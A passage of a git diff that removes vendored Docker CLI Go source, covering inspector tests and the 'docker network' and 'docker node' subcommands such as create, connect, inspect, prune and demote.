-	b := new(bytes.Buffer)
-	tmpl, err := templates.Parse("{{.DNS}}")
-	if err != nil {
-		t.Fatal(err)
-	}
-	i := NewTemplateInspector(b, tmpl)
-
-	if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil {
-		t.Fatal(err)
-	}
-	if err := i.Inspect(testElement{"1.1.1.1"}, nil); err != nil {
-		t.Fatal(err)
-	}
-
-	if err := i.Flush(); err != nil {
-		t.Fatal(err)
-	}
-	if b.String() != "0.0.0.0\n1.1.1.1\n" {
-		t.Fatalf("Expected `0.0.0.0\\n1.1.1.1\\n`, got `%s`", b.String())
-	}
-}
-
-func TestIndentedInspectorDefault(t *testing.T) {
-	b := new(bytes.Buffer)
-	i := NewIndentedInspector(b)
-	if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil {
-		t.Fatal(err)
-	}
-
-	if err := i.Flush(); err != nil {
-		t.Fatal(err)
-	}
-
-	expected := `[
-    {
-        "Dns": "0.0.0.0"
-    }
-]
-`
-	if b.String() != expected {
-		t.Fatalf("Expected `%s`, got `%s`", expected, b.String())
-	}
-}
-
-func TestIndentedInspectorMultiple(t *testing.T) {
-	b := new(bytes.Buffer)
-	i := NewIndentedInspector(b)
-	if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil {
-		t.Fatal(err)
-	}
-
-	if err := i.Inspect(testElement{"1.1.1.1"}, nil); err != nil {
-		t.Fatal(err)
-	}
-
-	if err := i.Flush(); err != nil {
-		t.Fatal(err)
-	}
-
-	expected := `[
-    {
-        "Dns": "0.0.0.0"
-    },
-    {
-        "Dns": "1.1.1.1"
-    }
-]
-`
-	if b.String() != expected {
-		t.Fatalf("Expected `%s`, got `%s`", expected, b.String())
-	}
-}
-
-func TestIndentedInspectorEmpty(t *testing.T) {
-	b := new(bytes.Buffer)
-	i := NewIndentedInspector(b)
-
-	if err := i.Flush(); err != nil {
-		t.Fatal(err)
-	}
-
-	expected := "[]\n"
-	if b.String() != expected {
-		t.Fatalf("Expected `%s`, got `%s`", expected, b.String())
-	}
-}
-
-func TestIndentedInspectorRawElements(t *testing.T) {
-	b := new(bytes.Buffer)
-	i := NewIndentedInspector(b)
-	if err := i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Dns": "0.0.0.0", "Node": "0"}`)); err != nil {
-		t.Fatal(err)
-	}
-
-	if err := i.Inspect(testElement{"1.1.1.1"}, []byte(`{"Dns": "1.1.1.1", "Node": "1"}`)); err != nil {
-		t.Fatal(err)
-	}
-
-	if err := i.Flush(); err != nil {
-		t.Fatal(err)
-	}
-
-	expected := `[
-    {
-        "Dns": "0.0.0.0",
-        "Node": "0"
-    },
-    {
-        "Dns": "1.1.1.1",
-        "Node": "1"
-    }
-]
-`
-	if b.String() != expected {
-		t.Fatalf("Expected `%s`, got `%s`", expected, b.String())
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/network/cmd.go b/vendor/github.com/docker/docker/cli/command/network/cmd.go
deleted file mode 100644
index ab8393cded..0000000000
--- a/vendor/github.com/docker/docker/cli/command/network/cmd.go
+++ /dev/null
@@ -1,28 +0,0 @@
-package network
-
-import (
-	"github.com/spf13/cobra"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-)
-
-// NewNetworkCommand returns a cobra command for `network` subcommands
-func NewNetworkCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "network",
-		Short: "Manage networks",
-		Args:  cli.NoArgs,
-		RunE:  dockerCli.ShowHelp,
-	}
-	cmd.AddCommand(
-		newConnectCommand(dockerCli),
-		newCreateCommand(dockerCli),
-		newDisconnectCommand(dockerCli),
-		newInspectCommand(dockerCli),
-		newListCommand(dockerCli),
-		newRemoveCommand(dockerCli),
-		NewPruneCommand(dockerCli),
-	)
-	return cmd
-}
diff --git a/vendor/github.com/docker/docker/cli/command/network/connect.go b/vendor/github.com/docker/docker/cli/command/network/connect.go
deleted file mode 100644
index c4b676e5f1..0000000000
--- a/vendor/github.com/docker/docker/cli/command/network/connect.go
+++ /dev/null
@@ -1,64 +0,0 @@
-package network
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types/network"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/opts"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/spf13/cobra"
-)
-
-type connectOptions struct {
-	network      string
-	container    string
-	ipaddress    string
-	ipv6address  string
-	links        opts.ListOpts
-	aliases      []string
-	linklocalips []string
-}
-
-func newConnectCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := connectOptions{
-		links: opts.NewListOpts(runconfigopts.ValidateLink),
-	}
-
-	cmd := &cobra.Command{
-		Use:   "connect [OPTIONS] NETWORK CONTAINER",
-		Short: "Connect a container to a network",
-		Args:  cli.ExactArgs(2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.network = args[0]
-			opts.container = args[1]
-			return runConnect(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVar(&opts.ipaddress, "ip", "", "IP Address")
-	flags.StringVar(&opts.ipv6address, "ip6", "", "IPv6 Address")
-	flags.Var(&opts.links, "link", "Add link to another container")
-	flags.StringSliceVar(&opts.aliases, "alias", []string{}, "Add network-scoped alias for the container")
-	flags.StringSliceVar(&opts.linklocalips, "link-local-ip", []string{}, "Add a link-local address for the container")
-
-	return cmd
-}
-
-func runConnect(dockerCli *command.DockerCli, opts connectOptions) error {
-	client := dockerCli.Client()
-
-	epConfig := &network.EndpointSettings{
-		IPAMConfig: &network.EndpointIPAMConfig{
-			IPv4Address:  opts.ipaddress,
-			IPv6Address:  opts.ipv6address,
-			LinkLocalIPs: opts.linklocalips,
-		},
-		Links:   opts.links.GetAll(),
-		Aliases: opts.aliases,
-	}
-
-	return client.NetworkConnect(context.Background(), opts.network, opts.container, epConfig)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/network/create.go b/vendor/github.com/docker/docker/cli/command/network/create.go
deleted file mode 100644
index abc494e1e0..0000000000
--- a/vendor/github.com/docker/docker/cli/command/network/create.go
+++ /dev/null
@@ -1,226 +0,0 @@
-package network
-
-import (
-	"fmt"
-	"net"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/network"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/opts"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/spf13/cobra"
-)
-
-type createOptions struct {
-	name       string
-	driver     string
-	driverOpts opts.MapOpts
-	labels     opts.ListOpts
-	internal   bool
-	ipv6       bool
-	attachable bool
-
-	ipamDriver  string
-	ipamSubnet  []string
-	ipamIPRange []string
-	ipamGateway []string
-	ipamAux     opts.MapOpts
-	ipamOpt     opts.MapOpts
-}
-
-func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := createOptions{
-		driverOpts: *opts.NewMapOpts(nil, nil),
-		labels:     opts.NewListOpts(runconfigopts.ValidateEnv),
-		ipamAux:    *opts.NewMapOpts(nil, nil),
-		ipamOpt:    *opts.NewMapOpts(nil, nil),
-	}
-
-	cmd := &cobra.Command{
-		Use:   "create [OPTIONS] NETWORK",
-		Short: "Create a network",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.name = args[0]
-			return runCreate(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVarP(&opts.driver, "driver", "d", "bridge", "Driver to manage the Network")
-	flags.VarP(&opts.driverOpts, "opt", "o", "Set driver specific options")
-	flags.Var(&opts.labels, "label", "Set metadata on a network")
-	flags.BoolVar(&opts.internal, "internal", false, "Restrict external access to the network")
-	flags.BoolVar(&opts.ipv6, "ipv6", false, "Enable IPv6 networking")
-	flags.BoolVar(&opts.attachable, "attachable", false, "Enable manual container attachment")
-
-	flags.StringVar(&opts.ipamDriver, "ipam-driver", "default", "IP Address Management Driver")
-	flags.StringSliceVar(&opts.ipamSubnet, "subnet", []string{}, "Subnet in CIDR format that represents a network segment")
-	flags.StringSliceVar(&opts.ipamIPRange, "ip-range", []string{}, "Allocate container ip from a sub-range")
-	flags.StringSliceVar(&opts.ipamGateway, "gateway", []string{}, "IPv4 or IPv6 Gateway for the master subnet")
-
-	flags.Var(&opts.ipamAux, "aux-address", "Auxiliary IPv4 or IPv6 addresses used by Network driver")
-	flags.Var(&opts.ipamOpt, "ipam-opt", "Set IPAM driver specific options")
-
-	return cmd
-}
-
-func runCreate(dockerCli *command.DockerCli, opts createOptions) error {
-	client := dockerCli.Client()
-
-	ipamCfg, err := consolidateIpam(opts.ipamSubnet, opts.ipamIPRange, opts.ipamGateway, opts.ipamAux.GetAll())
-	if err != nil {
-		return err
-	}
-
-	// Construct network create request body
-	nc := types.NetworkCreate{
-		Driver:  opts.driver,
-		Options: opts.driverOpts.GetAll(),
-		IPAM: &network.IPAM{
-			Driver:  opts.ipamDriver,
-			Config:  ipamCfg,
-			Options: opts.ipamOpt.GetAll(),
-		},
-		CheckDuplicate: true,
-		Internal:       opts.internal,
-		EnableIPv6:     opts.ipv6,
-		Attachable:     opts.attachable,
-		Labels:         runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()),
-	}
-
-	resp, err := client.NetworkCreate(context.Background(), opts.name, nc)
-	if err != nil {
-		return err
-	}
-	fmt.Fprintf(dockerCli.Out(), "%s\n", resp.ID)
-	return nil
-}
-
-// Consolidates the ipam configuration as a group from different related configurations
-// user can configure network with multiple non-overlapping subnets and hence it is
-// possible to correlate the various related parameters and consolidate them.
-// consoidateIpam consolidates subnets, ip-ranges, gateways and auxiliary addresses into
-// structured ipam data.
-func consolidateIpam(subnets, ranges, gateways []string, auxaddrs map[string]string) ([]network.IPAMConfig, error) {
-	if len(subnets) < len(ranges) || len(subnets) < len(gateways) {
-		return nil, fmt.Errorf("every ip-range or gateway must have a corresponding subnet")
-	}
-	iData := map[string]*network.IPAMConfig{}
-
-	// Populate non-overlapping subnets into consolidation map
-	for _, s := range subnets {
-		for k := range iData {
-			ok1, err := subnetMatches(s, k)
-			if err != nil {
-				return nil, err
-			}
-			ok2, err := subnetMatches(k, s)
-			if err != nil {
-				return nil, err
-			}
-			if ok1 || ok2 {
-				return nil, fmt.Errorf("multiple overlapping subnet configuration is not supported")
-			}
-		}
-		iData[s] = &network.IPAMConfig{Subnet: s, AuxAddress: map[string]string{}}
-	}
-
-	// Validate and add valid ip ranges
-	for _, r := range ranges {
-		match := false
-		for _, s := range subnets {
-			ok, err := subnetMatches(s, r)
-			if err != nil {
-				return nil, err
-			}
-			if !ok {
-				continue
-			}
-			if iData[s].IPRange != "" {
-				return nil, fmt.Errorf("cannot configure multiple ranges (%s, %s) on the same subnet (%s)", r, iData[s].IPRange, s)
-			}
-			d := iData[s]
-			d.IPRange = r
-			match = true
-		}
-		if !match {
-			return nil, fmt.Errorf("no matching subnet for range %s", r)
-		}
-	}
-
-	// Validate and add valid gateways
-	for _, g := range gateways {
-		match := false
-		for _, s := range subnets {
-			ok, err := subnetMatches(s, g)
-			if err != nil {
-				return nil, err
-			}
-			if !ok {
-				continue
-			}
-			if iData[s].Gateway != "" {
-				return nil, fmt.Errorf("cannot configure multiple gateways (%s, %s) for the same subnet (%s)", g, iData[s].Gateway, s)
-			}
-			d := iData[s]
-			d.Gateway = g
-			match = true
-		}
-		if !match {
-			return nil, fmt.Errorf("no matching subnet for gateway %s", g)
-		}
-	}
-
-	// Validate and add aux-addresses
-	for key, aa := range auxaddrs {
-		match := false
-		for _, s := range subnets {
-			ok, err := subnetMatches(s, aa)
-			if err != nil {
-				return nil, err
-			}
-			if !ok {
-				continue
-			}
-			iData[s].AuxAddress[key] = aa
-			match = true
-		}
-		if !match {
-			return nil, fmt.Errorf("no matching subnet for aux-address %s", aa)
-		}
-	}
-
-	idl := []network.IPAMConfig{}
-	for _, v := range iData {
-		idl = append(idl, *v)
-	}
-	return idl, nil
-}
-
-func subnetMatches(subnet, data string) (bool, error) {
-	var (
-		ip net.IP
-	)
-
-	_, s, err := net.ParseCIDR(subnet)
-	if err != nil {
-		return false, fmt.Errorf("Invalid subnet %s : %v", s, err)
-	}
-
-	if strings.Contains(data, "/") {
-		ip, _, err = net.ParseCIDR(data)
-		if err != nil {
-			return false, fmt.Errorf("Invalid cidr %s : %v", data, err)
-		}
-	} else {
-		ip = net.ParseIP(data)
-	}
-
-	return s.Contains(ip), nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/network/disconnect.go b/vendor/github.com/docker/docker/cli/command/network/disconnect.go
deleted file mode 100644
index c9d9c14a13..0000000000
--- a/vendor/github.com/docker/docker/cli/command/network/disconnect.go
+++ /dev/null
@@ -1,41 +0,0 @@
-package network
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type disconnectOptions struct {
-	network   string
-	container string
-	force     bool
-}
-
-func newDisconnectCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := disconnectOptions{}
-
-	cmd := &cobra.Command{
-		Use:   "disconnect [OPTIONS] NETWORK CONTAINER",
-		Short: "Disconnect a container from a network",
-		Args:  cli.ExactArgs(2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.network = args[0]
-			opts.container = args[1]
-			return runDisconnect(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.force, "force", "f", false, "Force the container to disconnect from a network")
-
-	return cmd
-}
-
-func runDisconnect(dockerCli *command.DockerCli, opts disconnectOptions) error {
-	client := dockerCli.Client()
-
-	return client.NetworkDisconnect(context.Background(), opts.network, opts.container, opts.force)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/network/inspect.go b/vendor/github.com/docker/docker/cli/command/network/inspect.go
deleted file mode 100644
index 1a86855f71..0000000000
--- a/vendor/github.com/docker/docker/cli/command/network/inspect.go
+++ /dev/null
@@ -1,45 +0,0 @@
-package network
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/inspect"
-	"github.com/spf13/cobra"
-)
-
-type inspectOptions struct {
-	format string
-	names  []string
-}
-
-func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts inspectOptions
-
-	cmd := &cobra.Command{
-		Use:   "inspect [OPTIONS] NETWORK [NETWORK...]",
-		Short: "Display detailed information on one or more networks",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.names = args
-			return runInspect(dockerCli, opts)
-		},
-	}
-
-	cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
-
-	return cmd
-}
-
-func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
-	client := dockerCli.Client()
-
-	ctx := context.Background()
-
-	getNetFunc := func(name string) (interface{}, []byte, error) {
-		return client.NetworkInspectWithRaw(ctx, name)
-	}
-
-	return inspect.Inspect(dockerCli.Out(), opts.names, opts.format, getNetFunc)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/network/list.go b/vendor/github.com/docker/docker/cli/command/network/list.go
deleted file mode 100644
index 1a5d285103..0000000000
--- a/vendor/github.com/docker/docker/cli/command/network/list.go
+++ /dev/null
@@ -1,76 +0,0 @@
-package network
-
-import (
-	"sort"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/formatter"
-	"github.com/docker/docker/opts"
-	"github.com/spf13/cobra"
-)
-
-type byNetworkName []types.NetworkResource
-
-func (r byNetworkName) Len() int           { return len(r) }
-func (r byNetworkName) Swap(i, j int)      { r[i], r[j] = r[j], r[i] }
-func (r byNetworkName) Less(i, j int) bool { return r[i].Name < r[j].Name }
-
-type listOptions struct {
-	quiet   bool
-	noTrunc bool
-	format  string
-	filter  opts.FilterOpt
-}
-
-func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := listOptions{filter: opts.NewFilterOpt()}
-
-	cmd := &cobra.Command{
-		Use:     "ls [OPTIONS]",
-		Aliases: []string{"list"},
-		Short:   "List networks",
-		Args:    cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runList(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display network IDs")
-	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate the output")
-	flags.StringVar(&opts.format, "format", "", "Pretty-print networks using a Go template")
-	flags.VarP(&opts.filter, "filter", "f", "Provide filter values (e.g. 'driver=bridge')")
-
-	return cmd
-}
-
-func runList(dockerCli *command.DockerCli, opts listOptions) error {
-	client := dockerCli.Client()
-	options := types.NetworkListOptions{Filters: opts.filter.Value()}
-	networkResources, err := client.NetworkList(context.Background(), options)
-	if err != nil {
-		return err
-	}
-
-	format := opts.format
-	if len(format) == 0 {
-		if len(dockerCli.ConfigFile().NetworksFormat) > 0 && !opts.quiet {
-			format = dockerCli.ConfigFile().NetworksFormat
-		} else {
-			format = formatter.TableFormatKey
-		}
-	}
-
-	sort.Sort(byNetworkName(networkResources))
-
-	networksCtx := formatter.Context{
-		Output: dockerCli.Out(),
-		Format: formatter.NewNetworkFormat(format, opts.quiet),
-		Trunc:  !opts.noTrunc,
-	}
-	return formatter.NetworkWrite(networksCtx, networkResources)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/network/prune.go b/vendor/github.com/docker/docker/cli/command/network/prune.go
deleted file mode 100644
index 9f1979e6b5..0000000000
--- a/vendor/github.com/docker/docker/cli/command/network/prune.go
+++ /dev/null
@@ -1,73 +0,0 @@
-package network
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type pruneOptions struct {
-	force bool
-}
-
-// NewPruneCommand returns a new cobra prune command for networks
-func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts pruneOptions
-
-	cmd := &cobra.Command{
-		Use:   "prune [OPTIONS]",
-		Short: "Remove all unused networks",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			output, err := runPrune(dockerCli, opts)
-			if err != nil {
-				return err
-			}
-			if output != "" {
-				fmt.Fprintln(dockerCli.Out(), output)
-			}
-			return nil
-		},
-		Tags: map[string]string{"version": "1.25"},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation")
-
-	return cmd
-}
-
-const warning = `WARNING! This will remove all networks not used by at least one container.
-Are you sure you want to continue?`
-
-func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (output string, err error) {
-	if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) {
-		return
-	}
-
-	report, err := dockerCli.Client().NetworksPrune(context.Background(), filters.Args{})
-	if err != nil {
-		return
-	}
-
-	if len(report.NetworksDeleted) > 0 {
-		output = "Deleted Networks:\n"
-		for _, id := range report.NetworksDeleted {
-			output += id + "\n"
-		}
-	}
-
-	return
-}
-
-// RunPrune calls the Network Prune API
-// This returns the amount of space reclaimed and a detailed output string
-func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) {
-	output, err := runPrune(dockerCli, pruneOptions{force: true})
-	return 0, output, err
-}
diff --git a/vendor/github.com/docker/docker/cli/command/network/remove.go b/vendor/github.com/docker/docker/cli/command/network/remove.go
deleted file mode 100644
index 2034b8709e..0000000000
--- a/vendor/github.com/docker/docker/cli/command/network/remove.go
+++ /dev/null
@@ -1,43 +0,0 @@
-package network
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
-	return &cobra.Command{
-		Use:     "rm NETWORK [NETWORK...]",
-		Aliases: []string{"remove"},
-		Short:   "Remove one or more networks",
-		Args:    cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runRemove(dockerCli, args)
-		},
-	}
-}
-
-func runRemove(dockerCli *command.DockerCli, networks []string) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-	status := 0
-
-	for _, name := range networks {
-		if err := client.NetworkRemove(ctx, name); err != nil {
-			fmt.Fprintf(dockerCli.Err(), "%s\n", err)
-			status = 1
-			continue
-		}
-		fmt.Fprintf(dockerCli.Out(), "%s\n", name)
-	}
-
-	if status != 0 {
-		return cli.StatusError{StatusCode: status}
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/node/cmd.go b/vendor/github.com/docker/docker/cli/command/node/cmd.go
deleted file mode 100644
index e71b9199ad..0000000000
--- a/vendor/github.com/docker/docker/cli/command/node/cmd.go
+++ /dev/null
@@ -1,43 +0,0 @@
-package node
-
-import (
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	apiclient "github.com/docker/docker/client"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-// NewNodeCommand returns a cobra command for `node` subcommands
-func NewNodeCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "node",
-		Short: "Manage Swarm nodes",
-		Args:  cli.NoArgs,
-		RunE:  dockerCli.ShowHelp,
-	}
-	cmd.AddCommand(
-		newDemoteCommand(dockerCli),
-		newInspectCommand(dockerCli),
-		newListCommand(dockerCli),
-		newPromoteCommand(dockerCli),
-		newRemoveCommand(dockerCli),
-		newPsCommand(dockerCli),
-		newUpdateCommand(dockerCli),
-	)
-	return cmd
-}
-
-// Reference returns the reference of a node. The special value "self" for a node
-// reference is mapped to the current node, hence the node ID is retrieved using
-// the `/info` endpoint.
-func Reference(ctx context.Context, client apiclient.APIClient, ref string) (string, error) {
-	if ref == "self" {
-		info, err := client.Info(ctx)
-		if err != nil {
-			return "", err
-		}
-		return info.Swarm.NodeID, nil
-	}
-	return ref, nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/node/demote.go b/vendor/github.com/docker/docker/cli/command/node/demote.go
deleted file mode 100644
index 33f86c6499..0000000000
--- a/vendor/github.com/docker/docker/cli/command/node/demote.go
+++ /dev/null
@@ -1,36 +0,0 @@
-package node
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-func newDemoteCommand(dockerCli *command.DockerCli) *cobra.Command {
-	return &cobra.Command{
-		Use:   "demote NODE [NODE...]",
-		Short: "Demote one or more nodes from manager in the swarm",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runDemote(dockerCli, args)
-		},
-	}
-}
-
-func runDemote(dockerCli *command.DockerCli, nodes []string) error {
-	demote := func(node *swarm.Node) error {
-		if node.Spec.Role == swarm.NodeRoleWorker {
-			fmt.Fprintf(dockerCli.Out(), "Node %s is already a worker.\n", node.ID)
-			return errNoRoleChange
-		}
-		node.Spec.Role = swarm.NodeRoleWorker
-		return nil
-	}
-	success := func(nodeID string) {
-		fmt.Fprintf(dockerCli.Out(), "Manager %s demoted in the swarm.\n", nodeID)
-	}
-	return updateNodes(dockerCli, nodes, demote, success)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/node/inspect.go b/vendor/github.com/docker/docker/cli/command/node/inspect.go
deleted file mode 100644
index fde70185f8..0000000000
--- a/vendor/github.com/docker/docker/cli/command/node/inspect.go
+++ /dev/null
@@ -1,144 +0,0 @@
-package node
-
-import (
-	"fmt"
-	"io"
-	"sort"
-	"strings"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/inspect"
-	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/go-units"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type inspectOptions struct {
-	nodeIds []string
-	format  string
-	pretty  bool
-}
-
-func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts inspectOptions
-
-	cmd := &cobra.Command{
-		Use:   "inspect [OPTIONS] self|NODE [NODE...]",
-		Short: "Display detailed information on one or more nodes",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.nodeIds = args
-			return runInspect(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
-	flags.BoolVar(&opts.pretty, "pretty", false, "Print the information in a human friendly format.")
-	return cmd
-}
-
-func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-	getRef := func(ref string) (interface{}, []byte, error) {
-		nodeRef, err := Reference(ctx, client, ref)
-		if err != nil {
-			return nil, nil, err
-		}
-		node, _, err := client.NodeInspectWithRaw(ctx, nodeRef)
-		return node, nil, err
-	}
-
-	if !opts.pretty {
-		return inspect.Inspect(dockerCli.Out(), opts.nodeIds, opts.format, getRef)
-	}
-	return printHumanFriendly(dockerCli.Out(), opts.nodeIds, getRef)
-}
-
-func printHumanFriendly(out io.Writer, refs []string, getRef inspect.GetRefFunc) error {
-	for idx, ref := range refs {
-		obj, _, err := getRef(ref)
-		if err != nil {
-			return err
-		}
-		printNode(out, obj.(swarm.Node))
-
-		// TODO: better way to do this?
-		// print extra space between objects, but not after the last one
-		if idx+1 != len(refs) {
-			fmt.Fprintf(out, "\n\n")
-		} else {
-			fmt.Fprintf(out, "\n")
-		}
-	}
-	return nil
-}
-
-// TODO: use a template
-func printNode(out io.Writer, node swarm.Node) {
-	fmt.Fprintf(out, "ID:\t\t\t%s\n", node.ID)
-	ioutils.FprintfIfNotEmpty(out, "Name:\t\t\t%s\n", node.Spec.Name)
-	if node.Spec.Labels != nil {
-		fmt.Fprintln(out, "Labels:")
-		for k, v := range node.Spec.Labels {
-			fmt.Fprintf(out, " - %s = %s\n", k, v)
-		}
-	}
-
-	ioutils.FprintfIfNotEmpty(out, "Hostname:\t\t%s\n", node.Description.Hostname)
-	fmt.Fprintf(out, "Joined at:\t\t%s\n", command.PrettyPrint(node.CreatedAt))
-	fmt.Fprintln(out, "Status:")
-	fmt.Fprintf(out, " State:\t\t\t%s\n", command.PrettyPrint(node.Status.State))
-	ioutils.FprintfIfNotEmpty(out, " Message:\t\t%s\n", command.PrettyPrint(node.Status.Message))
-	fmt.Fprintf(out, " Availability:\t\t%s\n", command.PrettyPrint(node.Spec.Availability))
-	ioutils.FprintfIfNotEmpty(out, " Address:\t\t%s\n", command.PrettyPrint(node.Status.Addr))
-
-	if node.ManagerStatus != nil {
-		fmt.Fprintln(out, "Manager Status:")
-		fmt.Fprintf(out, " Address:\t\t%s\n", node.ManagerStatus.Addr)
-		fmt.Fprintf(out, " Raft Status:\t\t%s\n", command.PrettyPrint(node.ManagerStatus.Reachability))
-		leader := "No"
-		if node.ManagerStatus.Leader {
-			leader = "Yes"
-		}
-		fmt.Fprintf(out, " Leader:\t\t%s\n", leader)
-	}
-
-	fmt.Fprintln(out, "Platform:")
-	fmt.Fprintf(out, " Operating System:\t%s\n", node.Description.Platform.OS)
-	fmt.Fprintf(out, " Architecture:\t\t%s\n", node.Description.Platform.Architecture)
-
-	fmt.Fprintln(out, "Resources:")
-	fmt.Fprintf(out, " CPUs:\t\t\t%d\n", node.Description.Resources.NanoCPUs/1e9)
-	fmt.Fprintf(out, " Memory:\t\t%s\n", units.BytesSize(float64(node.Description.Resources.MemoryBytes)))
-
-	var pluginTypes []string
-	pluginNamesByType := map[string][]string{}
-	for _, p := range node.Description.Engine.Plugins {
-		// append to pluginTypes only if not done previously
-		if _, ok := pluginNamesByType[p.Type]; !ok {
-			pluginTypes = append(pluginTypes, p.Type)
-		}
-		pluginNamesByType[p.Type] = append(pluginNamesByType[p.Type], p.Name)
-	}
-
-	if len(pluginTypes) > 0 {
-		fmt.Fprintln(out, "Plugins:")
-		sort.Strings(pluginTypes) // ensure stable output
-		for _, pluginType := range pluginTypes {
-			fmt.Fprintf(out, "  %s:\t\t%s\n", pluginType, strings.Join(pluginNamesByType[pluginType], ", "))
-		}
-	}
-	fmt.Fprintf(out, "Engine Version:\t\t%s\n", node.Description.Engine.EngineVersion)
-
-	if len(node.Description.Engine.Labels) != 0 {
-		fmt.Fprintln(out, "Engine Labels:")
-		for k, v := range node.Description.Engine.Labels {
-			fmt.Fprintf(out, " - %s = %s\n", k, v)
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/node/list.go b/vendor/github.com/docker/docker/cli/command/node/list.go
deleted file mode 100644
index 9cacdcf441..0000000000
--- a/vendor/github.com/docker/docker/cli/command/node/list.go
+++ /dev/null
@@ -1,115 +0,0 @@
-package node
-
-import (
-	"fmt"
-	"io"
-	"text/tabwriter"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/opts"
-	"github.com/spf13/cobra"
-)
-
-const (
-	listItemFmt = "%s\t%s\t%s\t%s\t%s\n"
-)
-
-type listOptions struct {
-	quiet  bool
-	filter opts.FilterOpt
-}
-
